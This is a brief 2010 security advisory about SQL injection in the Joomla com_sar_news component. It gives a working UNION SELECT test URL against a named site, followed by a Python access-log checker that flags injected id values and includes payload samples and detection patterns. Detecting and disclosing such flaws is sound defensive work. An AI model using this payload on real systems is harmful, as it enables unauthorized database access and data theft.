Joomla com_sar_news SQL Injection Vulnerability

Source: 岁月联盟  Editor: 老鹰  Date: 2010-06-06

Test method:

LyNx

http://syue.com/index.php?option=com_sar_news&id=80[SQL]&sort_by=ordering

http://syue.com/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering
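
An added example (not part of the original advisory): a log check that flags requests to com_sar_news whose id parameter is not a plain integer, which is how the test URL above would show up in a web server access log. The log lines are constructed, and the assumption that id is always a numeric record ID is taken from the page's id=80.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation addresses.
# The second line is a shortened form of the page's test URL.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jun/2010:10:00:01 +0000] "GET /index.php?option=com_sar_news&id=80&sort_by=ordering HTTP/1.1" 200 5120',
    '192.0.2.66 - - [06/Jun/2010:10:00:07 +0000] "GET /index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3/*&sort_by=ordering HTTP/1.1" 200 4711',
    '192.0.2.66 - - [06/Jun/2010:10:00:09 +0000] "GET /index.php?option=com_sar_news&id=80%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 4711',
    '192.0.2.11 - - [06/Jun/2010:10:00:12 +0000] "GET /index.php?option=com_content&id=12:about HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers seen in the page's test URL: SQL comments used as spacing, UNION SELECT.
MARKERS = {
    "sql-comment": re.compile(r"/\*"),
    "union-select": re.compile(r"union.{0,20}select", re.I | re.S),
}


def suspicious_requests(lines, component="com_sar_news", param="id"):
    """Return one dict per request whose `param` is not a plain integer.

    Assumption: the component expects `id` to be a numeric record ID,
    as in the page's id=80.
    """
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared decoded.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if component not in query.get("option", []):
            continue
        for value in query.get(param, []):
            if re.fullmatch(r"[0-9]+", value):
                continue
            tags = [name for name, rx in MARKERS.items() if rx.search(value)]
            hits.append({"client": line.split()[0], "value": value, "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["client"], hit["tags"], hit["value"])
```

Only the query string is inspected, so parameters sent in a POST body would need the same check at the application or WAF layer.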